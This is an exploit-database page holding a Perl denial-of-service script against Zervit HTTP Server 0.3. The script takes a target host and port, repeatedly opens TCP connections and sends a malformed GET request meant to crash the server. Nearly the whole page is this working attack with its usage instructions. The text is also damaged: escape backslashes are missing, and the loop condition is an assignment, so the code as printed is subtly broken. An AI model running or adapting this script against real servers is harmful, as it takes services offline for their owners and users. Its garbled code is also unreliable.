[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service
# Published : 2009-04-22
# Author : Jonathan Salwan
# Previous Title : Counter Strike Source ManiAdminPlugin v2 Remote Crash Exploit
# Next Title : Zervit Webserver 0.3 Remote Denial Of Service Exploit
#!/usr/bin/perl
#
# Zervit HTTP Server <= v0.3 Remote Denial of Service.
#
# --------------------------------------------------------------------
# The vulnerability is caused due to an error in multi-socket.
# This can be exploited to crash the HTTP service.
# --------------------------------------------------------------------
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org
use IO::Socket;
print "[+] Author : Jonathan Salwann";
print "[+] Soft : Zervit 0.3 Remote DoSn";
if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host> <port>n";
print "[-] Exemple: file.pl 127.0.0.1 80n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...n";
for($i=0;$i=4;$i++)
{
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!n";
print $socket "GET x11 HTTP/1.0nrn";
}
# www.Syue.com [2009-04-22]